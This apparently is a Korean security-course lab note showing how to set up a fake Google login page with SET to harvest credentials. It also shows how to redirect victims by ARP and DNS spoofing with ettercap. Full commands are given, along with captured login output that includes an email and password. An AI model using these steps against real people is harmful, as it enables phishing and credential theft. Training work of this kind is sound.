- 페이크 웹 사이트을 제공하는 모의해킹 도구이다.
1. Setoolkit 환경 설정과 실행
service apache2 start # apache2 웹 서버 활성화
update-rc.d apache2 enable
vi /etc/setoolkit/set.config
APACHE_DIRECTORY=/var/www/html
setoolkit
2. 다른 터미널 창에서 'index.html', 'harvester_2022-05-22 17:15:31.971424.txt', 'post.php' 파일 생성 확인
- index.html : 가짜 Google 로그인 페이지
- 'harvester_2022-05-22 17:15:31.971424.txt' : 로그인할때 입력되는 아이디/패스워드가 저장되는 파일
- post.php : 가짜 Google 로그인 페이지에 입력되는 아이디/패스워드를 'harvester_2022~~~.txt'에 연결하는 파일
실제 사이트로 리다이렉트가 되는 URL이 포함되어 있음
cd /var/www/html
2-1. 타겟에서 공격자 IP로 접속
http://[공격자 IP]
2-2. 공격자는 Setoolkit출력 내용으로 타겟이 입력한 아이디/패스워드를 확인한다.
('Array\n',)
('(\n',)
(' [GALX] => SJLCkfgaqoM\n',)
(' [continue] => https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX\n',)
(' [service] => lso\n',)
(' [dsh] => -7381887106725792428\n',)
(' [_utf8] => \xe2\x98\x83\n',)
(' [bgresponse] => js_disabled\n',)
(' [pstMsg] => 1\n',)
(' [dnConn] => \n',)
(' [checkConnection] => \n',)
(' [checkedDomains] => youtube\n',)
(' [Email] => ncs10322@naver.com\n',)
(' [Passwd] => abcd1234\n',)
(' [signIn] => Sign in\n',)
(' [PersistentCookie] => yes\n',)
(')\n',
3. Setoolkit & DNS Spoofing을 이용한 페이크 웹 사이트 구성
- 공격자의 IP Forwarding 기능을 활성화 한다.
echo 1 > /proc/sys/net/ipv4/ip_forward
- 공격자의 '/etc/ettercap/etter.dns' 파일에 다음과 같은 내용을 설정한다.
echo "www.facebook.co.kr A 192.168.20.50" >> /etc/ettercap/etter.dns
echo "*.facebook.co.kr A 192.168.20.50" >> /etc/ettercap/etter.dns
echo "www.facebook.co.kr PTR 192.168.20.50" >> /etc/ettercap/etter.dns
- 공격자에서 'ettercap'을 실행하여 ARP Spoofing 및 DNS Spoofing을 실시한다.
ettercap -G &
# Sniff -> Unified sniffing -> Network interface : eth1 선택 -> 확인
# Hosts -> Scan for hosts 실시
# Hosts -> Host List 클릭 -> 목록 확인 -> Add to Target 1/2
# Mitm -> ARP poisoning -> Sniff remote connections 체크 -> 확인
# Plugins -> Manage the plugins -> dns_spoof 더블 클릭 -> * 표기 확인
# Start -> Start snffing
- 공격자는 Setoolkit을 실행하고, 타겟은 DNS 캐시 정보를 초기화하고 'nslookup'을 실시하여 DNS Spoofing 공격을 받고 있는지 확인한다.
ipconfig /flushdns
nslookup www.facebook.co.kr
'메가IT아카데미 국기과정 > 리눅스와 시스템보안' 카테고리의 다른 글
[3-8] 레지스터 구조 (0) | 2022.09.12 |
---|---|
[3-7] BeEF (0) | 2022.09.12 |
[3-5] Metasploit (0) | 2022.09.12 |
[3-4] Bash Shellshock 취약점 (0) | 2022.09.12 |
[3-3] Nmap 스캔 (0) | 2022.09.12 |